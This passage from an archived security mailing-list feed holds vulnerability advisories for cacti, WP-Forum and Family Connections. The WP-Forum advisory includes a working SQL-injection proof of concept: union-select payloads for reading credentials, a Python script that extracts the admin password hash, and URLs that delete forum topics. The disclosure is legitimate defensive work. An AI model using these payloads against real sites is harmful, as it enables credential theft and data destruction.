&lt;br&gt;graph_height, graph_width, graph_start and graph_end parameters.
&lt;br&gt;This issue only affects the oldstable (etch) version of cacti.
&lt;br&gt;&lt;br&gt;CVE-2009-4032
&lt;br&gt;&lt;br&gt;It was discovered that cacti is prone to several cross-site scripting
&lt;br&gt;attacks via different vectors.
&lt;br&gt;&lt;br&gt;CVE-2009-4112
&lt;br&gt;&lt;br&gt;It has been discovered that cacti allows authenticated administrator
&lt;br&gt;users to gain access to the host system by executing arbitrary commands
&lt;br&gt;via the &amp;quot;Data Input Method&amp;quot; for the &amp;quot;Linux - Get Memory Usage&amp;quot; setting.
&lt;br&gt;&lt;br&gt;There is no fix for this issue at this stage. Upstream will implement a
&lt;br&gt;whitelist policy to only allow certain &amp;quot;safe&amp;quot; commands. For the moment,
&lt;br&gt;we recommend that such access is only given to trusted users and that
&lt;br&gt;the options &amp;quot;Data Input&amp;quot; and &amp;quot;User Administration&amp;quot; are otherwise
&lt;br&gt;deactivated.
&lt;br&gt;&lt;br&gt;&lt;br&gt;For the oldstable distribution (etch), these problems have been fixed in
&lt;br&gt;version 0.8.6i-3.6.
&lt;br&gt;&lt;br&gt;For the stable distribution (lenny), this problem has been fixed in
&lt;br&gt;version 0.8.7b-2.1+lenny1.
&lt;br&gt;&lt;br&gt;For the testing distribution (squeeze), this problem will be fixed soon.
&lt;br&gt;&lt;br&gt;For the unstable distribution (sid), this problem has been fixed in
&lt;br&gt;version 0.8.7e-1.1.
&lt;br&gt;&lt;br&gt;&lt;br&gt;We recommend that you upgrade your cacti packages.
&lt;br&gt;&lt;br&gt;Upgrade instructions
&lt;br&gt;- --------------------
&lt;br&gt;&lt;br&gt;wget url
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will fetch the file for you
&lt;br&gt;dpkg -i file.deb
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install the referenced file.
&lt;br&gt;&lt;br&gt;If you are using the apt-get package manager, use the line for
&lt;br&gt;sources.list as given below:
&lt;br&gt;&lt;br&gt;apt-get update
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will update the internal database
&lt;br&gt;apt-get upgrade
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; will install corrected packages
&lt;br&gt;&lt;br&gt;You may use an automated update by adding the resources from the
&lt;br&gt;footer to the proper configuration.
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 4.0 alias etch
&lt;br&gt;- -------------------------------
&lt;br&gt;&lt;br&gt;Debian (oldstable)
&lt;br&gt;- ------------------
&lt;br&gt;&lt;br&gt;Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1122700 341b5828d95db91f81f5fbba65411d63
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;38419 4ee9e373817ebc32297e1c3de8fee10d
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; &amp;nbsp;590 bb8fb25c6db1cd6a2a785f879943d969
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e
&lt;br&gt;&lt;br&gt;&lt;br&gt;Debian GNU/Linux 5.0 alias lenny
&lt;br&gt;- --------------------------------
&lt;br&gt;&lt;br&gt;Debian (stable)
&lt;br&gt;- ---------------
&lt;br&gt;&lt;br&gt;Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
&lt;br&gt;&lt;br&gt;Source archives:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1972444 aa8a740a6ab88e3634b546c3e1bc502f
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp;37232 04459452593e23c5e837920cfd0f1789
&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp; &amp;nbsp; 1117 d67349656ce9514266e7d5d2f378a219
&lt;br&gt;&lt;br&gt;Architecture independent packages:
&lt;br&gt;&lt;br&gt;&amp;nbsp; &lt;a href=&quot;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb&lt;/a&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Size/MD5 checksum: &amp;nbsp;1847182 3876f128fdcc2aefa63d65531875d2ab
&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; These files will probably be moved into the stable distribution on
&lt;br&gt;&amp;nbsp; its next update.
&lt;br&gt;&lt;br&gt;- ---------------------------------------------------------------------------------
&lt;br&gt;For apt-get: deb &lt;a href=&quot;http://security.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://security.debian.org/&lt;/a&gt;&amp;nbsp;stable/updates main
&lt;br&gt;For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
&lt;br&gt;Mailing list: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=26814034&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;debian-security-announce@...&lt;/a&gt;
&lt;br&gt;Package info: `apt-cache show &amp;lt;pkg&amp;gt;' and &lt;a href=&quot;http://packages.debian.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://packages.debian.org/&lt;/a&gt;&amp;lt;pkg&amp;gt;
&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.10 (GNU/Linux)
&lt;br&gt;&lt;br&gt;iEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is
&lt;br&gt;EG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM
&lt;br&gt;=CLbl
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-SECURITY---DSA-1954-1--New-cacti-packages-fix-insufficient-input-sanitising-tp26814034p26814034.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814625</id>
	<title>[ISecAuditors Security Advisories] WP-Forum &lt;= 2.3 SQL Injection vulnerabilities</title>
	<published>2009-12-16T01:58:07Z</published>
	<updated>2009-12-16T01:58:07Z</updated>
	<author>
		<name>ISecAuditors Security Advisories</name>
	</author>
	<content type="html">=============================================
&lt;br&gt;INTERNET SECURITY AUDITORS ALERT 2009-010
&lt;br&gt;- Original release date: September 28th, 2009
&lt;br&gt;- Last revised: December 15th, 2009
&lt;br&gt;- Discovered by: Juan Galiana Lara
&lt;br&gt;- CVE ID: CVE-2009-3703
&lt;br&gt;- Severity: 8.5/10 (CVSS Base Score)
&lt;br&gt;=============================================
&lt;br&gt;&lt;br&gt;I. VULNERABILITY
&lt;br&gt;-------------------------
&lt;br&gt;WP-Forum &amp;lt;= 2.3 SQL Injection &amp; Blind SQL Injection vulnerabilities
&lt;br&gt;&lt;br&gt;II. BACKGROUND
&lt;br&gt;-------------------------
&lt;br&gt;WP-Forum is a discussion forum plugin for WordPress. It works with
&lt;br&gt;WordPress 2+ version and PHP &amp;gt;= 5.0
&lt;br&gt;&lt;br&gt;III. DESCRIPTION
&lt;br&gt;-------------------------
&lt;br&gt;WP-Forum fails to sanitized user supplied input and is vulnerable to
&lt;br&gt;SQL Injection and Blind SQL Injection. An attacker can obtain any data
&lt;br&gt;of the database including user logins and password's of the WordPress
&lt;br&gt;installation, allowing him to obtain access to the application and
&lt;br&gt;gain administration privileges.
&lt;br&gt;&lt;br&gt;For the SQL Injection vulnerability, is possible to concatenate other
&lt;br&gt;sql requests via &amp;quot;union select&amp;quot; sentence. The parameters &amp;quot;search_max&amp;quot;
&lt;br&gt;and &amp;quot;forum&amp;quot; are affected by this flaw.
&lt;br&gt;&lt;br&gt;Snippet of vulnerable code:
&lt;br&gt;&lt;br&gt;In wpf.class file:
&lt;br&gt;&lt;br&gt;1836 &amp;nbsp; &amp;nbsp; $option_max_days = $_POST['search_max']; &amp;nbsp; &amp;nbsp; &amp;nbsp; // &amp;lt;- this
&lt;br&gt;line is not being sanitized
&lt;br&gt;1837 &amp;nbsp; &amp;nbsp; $option_forums = $_POST['forum'];
&lt;br&gt;1838 &amp;nbsp; &amp;nbsp; if(!$option_max_days)
&lt;br&gt;1839 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;$option_max_days = 9999;
&lt;br&gt;1840 &amp;nbsp; &amp;nbsp; $op .= &amp;quot; AND $this-&amp;gt;t_posts.`date` &amp;gt; SUBDATE(CURDATE(),
&lt;br&gt;INTERVAL $option_max_days DAY) &amp;quot;;
&lt;br&gt;1841
&lt;br&gt;...
&lt;br&gt;1850 &amp;nbsp; &amp;nbsp; foreach((array)$option_forums as $f)
&lt;br&gt;1851 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $a .= $f.&amp;quot;,&amp;quot;; &amp;nbsp; &amp;nbsp;// &amp;lt;- &amp;lt;- this lines is not being
&lt;br&gt;sanitized
&lt;br&gt;1852
&lt;br&gt;1853 &amp;nbsp; &amp;nbsp; $a = substr($a, 0, strlen($a)-1 );
&lt;br&gt;1854 &amp;nbsp; &amp;nbsp; if(!$a)
&lt;br&gt;1855 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $w = &amp;quot;&amp;quot;;
&lt;br&gt;1856 &amp;nbsp; &amp;nbsp; else
&lt;br&gt;1857 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $w = &amp;quot;IN($a)&amp;quot;;
&lt;br&gt;1858
&lt;br&gt;1859 &amp;nbsp; &amp;nbsp; $sql = &amp;quot;SELECT $this-&amp;gt;t_threads.parent_id as pt,
&lt;br&gt;$this-&amp;gt;t_posts.id, text, $this-&amp;gt;t_posts.subject,
&lt;br&gt;$this-&amp;gt;t_posts.parent_id, $this-&amp;gt;t_posts.`date`, MATCH ($what) AGAINST
&lt;br&gt;('$search_string') AS score
&lt;br&gt;1860 &amp;nbsp; &amp;nbsp; FROM $this-&amp;gt;t_posts inner join $this-&amp;gt;t_threads on
&lt;br&gt;$this-&amp;gt;t_posts.parent_id = $this-&amp;gt;t_threads.id
&lt;br&gt;1861 &amp;nbsp; &amp;nbsp; WHERE $this-&amp;gt;t_threads.parent_id &amp;nbsp;$w
&lt;br&gt;1862 &amp;nbsp; &amp;nbsp; AND MATCH (text) AGAINST ('$search_string') $op&amp;quot;;
&lt;br&gt;&lt;br&gt;In the case of the Blind SQL Injection, the vulnerable code is...
&lt;br&gt;&lt;br&gt;In wpf-post.php file:
&lt;br&gt;&lt;br&gt;&amp;nbsp;57 &amp;nbsp; &amp;nbsp; $id = $_GET['id']; // &amp;lt;- $_GET['id'] is directly assigned
&lt;br&gt;&amp;nbsp;58 &amp;nbsp; &amp;nbsp; $thread = $this-&amp;gt;check_parms($_GET['t']);
&lt;br&gt;&amp;nbsp;59
&lt;br&gt;&amp;nbsp;60 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $out .= $this-&amp;gt;header();
&lt;br&gt;&amp;nbsp;61
&lt;br&gt;&amp;nbsp;62 &amp;nbsp; &amp;nbsp; $post = $wpdb-&amp;gt;get_row(&amp;quot;SELECT * FROM $wpforum-&amp;gt;t_posts WHERE
&lt;br&gt;id = $id&amp;quot;); // &amp;lt;- id is used without clean up
&lt;br&gt;&lt;br&gt;other example:
&lt;br&gt;&lt;br&gt;1490 &amp;nbsp; &amp;nbsp; function remove_post(){
&lt;br&gt;1491 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; global $user_level, $user_ID, $wpdb;
&lt;br&gt;1492 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $id = $_GET['id']; // &amp;lt;- $_GET['id'] is directly assigned
&lt;br&gt;1493 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $author = $wpdb-&amp;gt;get_var(&amp;quot;SELECT author_id from
&lt;br&gt;$this-&amp;gt;t_posts where id = $id&amp;quot;); // id is used without clean up
&lt;br&gt;...
&lt;br&gt;1503 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if($del == &amp;quot;ok&amp;quot;){
&lt;br&gt;1504 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $wpdb-&amp;gt;query(&amp;quot;DELETE FROM $this-&amp;gt;t_posts WHERE id
&lt;br&gt;= $id&amp;quot;); &amp;lt;- // id is used without clean up
&lt;br&gt;1505 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $this-&amp;gt;o .= &amp;quot;&amp;lt;div class='updated'&amp;gt;&amp;quot;.__(&amp;quot;Post
&lt;br&gt;deleted&amp;quot;, &amp;quot;wpforum&amp;quot;).&amp;quot;&amp;lt;/div&amp;gt;&amp;quot;;
&lt;br&gt;1506 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }
&lt;br&gt;1507 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; else
&lt;br&gt;1508 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; wp_die(__(&amp;quot;Cheating, are we?&amp;quot;, &amp;quot;wpforum&amp;quot;));
&lt;br&gt;1509
&lt;br&gt;1510 &amp;nbsp; &amp;nbsp; }
&lt;br&gt;&lt;br&gt;the &amp;quot;id&amp;quot; parameter is vulnerable in other parts of the source code..
&lt;br&gt;&lt;br&gt;Also, is possible to delete all records in table $this-&amp;gt;t_posts and
&lt;br&gt;$this-&amp;gt;t_threads because $_GET['topic'] is not properly sanitized,
&lt;br&gt;injecting something like 1 or 1=1
&lt;br&gt;&lt;br&gt;1479 &amp;nbsp; &amp;nbsp; function remove_topic(){
&lt;br&gt;1480 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; global $user_level, $user_ID, $wpdb;
&lt;br&gt;1481 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $topic = $_GET['topic'];
&lt;br&gt;1482 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; if($this-&amp;gt;is_moderator($user_ID, $this-&amp;gt;current_forum)){
&lt;br&gt;1483 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $wpdb-&amp;gt;query(&amp;quot;DELETE FROM $this-&amp;gt;t_posts WHERE
&lt;br&gt;parent_id = $topic&amp;quot;);
&lt;br&gt;1484 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $wpdb-&amp;gt;query(&amp;quot;DELETE FROM $this-&amp;gt;t_threads WHERE
&lt;br&gt;id = $topic&amp;quot;);
&lt;br&gt;1485 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; }
&lt;br&gt;1486 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; else
&lt;br&gt;1487 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; wp_die(__(&amp;quot;Cheating, are we?&amp;quot;, &amp;quot;wpforum&amp;quot;));
&lt;br&gt;1488
&lt;br&gt;1489 &amp;nbsp; &amp;nbsp; }
&lt;br&gt;&lt;br&gt;IV. PROOF OF CONCEPT
&lt;br&gt;-------------------------
&lt;br&gt;In the url: &lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=search&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=search&lt;/a&gt;&lt;br&gt;replacing 'page_id=3' parameter with the number of the WP-Forum page
&lt;br&gt;in each case
&lt;br&gt;&lt;br&gt;Is possible to obtain any data of the database. Here is a proof of
&lt;br&gt;concept to obtain user_pass, user_login and user_email of the user
&lt;br&gt;with id=1 of wp_users table (normally admin).
&lt;br&gt;&lt;br&gt;We have to fill the search_max parameter with the value:
&lt;br&gt;&lt;br&gt;9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1
&lt;br&gt;and subdate(curdate(), interval 9999
&lt;br&gt;9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1
&lt;br&gt;and subdate(curdate(), interval 9999
&lt;br&gt;9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1
&lt;br&gt;and subdate(curdate(), interval 9999
&lt;br&gt;&lt;br&gt;I wrote a PoC, to get automatically the password hash of the WordPress
&lt;br&gt;admin account:
&lt;br&gt;&lt;br&gt;user@linuz:~$ cat wpforum2.3-poc.py
&lt;br&gt;#!/usr/bin/python
&lt;br&gt;&lt;br&gt;# WP-Forum &amp;lt;= 2.3 SQL Injection PoC
&lt;br&gt;# Juan Galiana Lara
&lt;br&gt;# Internet Security Auditors
&lt;br&gt;&lt;br&gt;import urllib
&lt;br&gt;import urllib2
&lt;br&gt;import re
&lt;br&gt;&lt;br&gt;url = '&lt;a href=&quot;http://site//wordpress/?page_id=3&amp;wpforumaction=search'&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://site//wordpress/?page_id=3&amp;wpforumaction=search'&lt;/a&gt;&lt;br&gt;values = {'search_words' : 'any',
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 'search_submit' : 'Search',
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1
&lt;br&gt;from wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }
&lt;br&gt;&lt;br&gt;data = urllib.urlencode(values)
&lt;br&gt;req = urllib2.Request(url, data)
&lt;br&gt;response = urllib2.urlopen(req)
&lt;br&gt;output = response.read()
&lt;br&gt;o = re.search('viewtopic.+&amp;gt;([$].+)&amp;lt;',output)
&lt;br&gt;if o:
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print o.group(1)
&lt;br&gt;&lt;br&gt;user@linuz:~$ python wpforum2.3-poc.py
&lt;br&gt;$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/
&lt;br&gt;user@linuz:~$
&lt;br&gt;&lt;br&gt;That's it!
&lt;br&gt;&lt;br&gt;For the blind sql injection, here are some examples:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=0&amp;t=.0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=0&amp;t=.0&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=1&amp;t=.0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=editpost&amp;id=1%20and%201=1&amp;t=.0&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=0&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=2.0&amp;delete_topic&amp;topic=3%20and%201=1&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=0&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=viewtopic&amp;t=1.0&amp;sticky&amp;id=1%20and%201=1&lt;/a&gt;&lt;br&gt;&lt;br&gt;Is possible to delete all topics, injecting sql code in &amp;quot;topic&amp;quot; parameter:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=1.0&amp;delete_topic&amp;topic=5%20or%201=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://example.com/blog/?page_id=3&amp;wpforumaction=viewforum&amp;f=1.0&amp;delete_topic&amp;topic=5%20or%201=1&lt;/a&gt;&lt;br&gt;&lt;br&gt;V. BUSINESS IMPACT
&lt;br&gt;-------------------------
&lt;br&gt;Unauthenticated users can obtain or delete any data of the database.
&lt;br&gt;This flaw could result in get access to WordPress accounts including
&lt;br&gt;the administrator one.
&lt;br&gt;&lt;br&gt;VI. SYSTEMS AFFECTED
&lt;br&gt;-------------------------
&lt;br&gt;WP-Forum &amp;lt;= 2.3 are vulnerable.
&lt;br&gt;&lt;br&gt;VII. SOLUTION
&lt;br&gt;-------------------------
&lt;br&gt;Update to version 2.4.
&lt;br&gt;&lt;br&gt;VIII. REFERENCES
&lt;br&gt;-------------------------
&lt;br&gt;&lt;a href=&quot;http://www.fahlstad.se/wp-plugins/wp-forum/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.fahlstad.se/wp-plugins/wp-forum/&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.wordpress.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.wordpress.org/&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://www.isecauditors.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.isecauditors.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;IX. CREDITS
&lt;br&gt;-------------------------
&lt;br&gt;This vulnerability has been discovered by
&lt;br&gt;Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
&lt;br&gt;&lt;br&gt;X. REVISION HISTORY
&lt;br&gt;-------------------------
&lt;br&gt;September &amp;nbsp;28, 2009: Initial release.
&lt;br&gt;October &amp;nbsp; &amp;nbsp;13, 2009: Review.
&lt;br&gt;October &amp;nbsp; &amp;nbsp;19, 2009: Added CVE id.
&lt;br&gt;December &amp;nbsp; 15, 2009: Last revision.
&lt;br&gt;&lt;br&gt;XI. DISCLOSURE TIMELINE
&lt;br&gt;-------------------------
&lt;br&gt;September &amp;nbsp;28, 2009: Vulnerability discovered
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;by Internet Security Auditors.
&lt;br&gt;October &amp;nbsp; &amp;nbsp;13, 2009: Sent to developers. No response.
&lt;br&gt;December &amp;nbsp; 13, 2009: Contact again. Response about its correction.
&lt;br&gt;December &amp;nbsp; 14, 2009: New version published.
&lt;br&gt;December &amp;nbsp; 15, 2009: Advisory released to lists.
&lt;br&gt;&lt;br&gt;XII. LEGAL NOTICES
&lt;br&gt;-------------------------
&lt;br&gt;The information contained within this advisory is supplied &amp;quot;as-is&amp;quot;
&lt;br&gt;with no warranties or guarantees of fitness of use or otherwise.
&lt;br&gt;Internet Security Auditors accepts no responsibility for any damage
&lt;br&gt;caused by the use or misuse of this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/-ISecAuditors-Security-Advisories--WP-Forum-%3C%3D-2.3-SQL-Injection-vulnerabilities-tp26814625p26814625.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-26814101</id>
	<title>Family Connections &lt;= 2.1.3 Multiple Remote Vulnerabilities</title>
	<published>2009-12-15T22:52:33Z</published>
	<updated>2009-12-15T22:52:33Z</updated>
	<author>
		<name>Salvatore Fresta aka Drosophila</name>
	</author>
	<content type="html">Family Connections &amp;lt;= 2.1.3 Multiple Remote Vulnerabilities
&lt;br&gt;&lt;br&gt; Name              Family Connections
&lt;br&gt; Vendor            &lt;a href=&quot;http://www.familycms.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.familycms.com&lt;/a&gt;&lt;br&gt; Versions Affected &amp;lt;= 2.1.3
&lt;br&gt;&lt;br&gt; Author            Salvatore Fresta aka Drosophila
&lt;br&gt; Website           &lt;a href=&quot;http://www.salvatorefresta.net&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.salvatorefresta.net&lt;/a&gt;&lt;br&gt; Contact           salvatorefresta [at] gmail [dot] com
&lt;br&gt; Date              2009-12-16
&lt;br&gt;&lt;br&gt;X. INDEX
&lt;br&gt;&lt;br&gt; I.    ABOUT THE APPLICATION
&lt;br&gt; II.   DESCRIPTION
&lt;br&gt; III.  ANALYSIS
&lt;br&gt; IV.   SAMPLE CODE
&lt;br&gt; V.    FIX
&lt;br&gt; VI.   DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;&lt;br&gt;I. ABOUT THE APPLICATION
&lt;br&gt;&lt;br&gt;Based on one of the world's leading structure  and content
&lt;br&gt;management systems - WebSiteAdmin, WSCreator  (WS standing
&lt;br&gt;for WebSite) is powerful application for handling multiple
&lt;br&gt;websites. This is a commercial application.
&lt;br&gt;Keep your family &amp;quot;Connected&amp;quot; with this content  management
&lt;br&gt;system (CMS) designed specifically with family's  in mind.
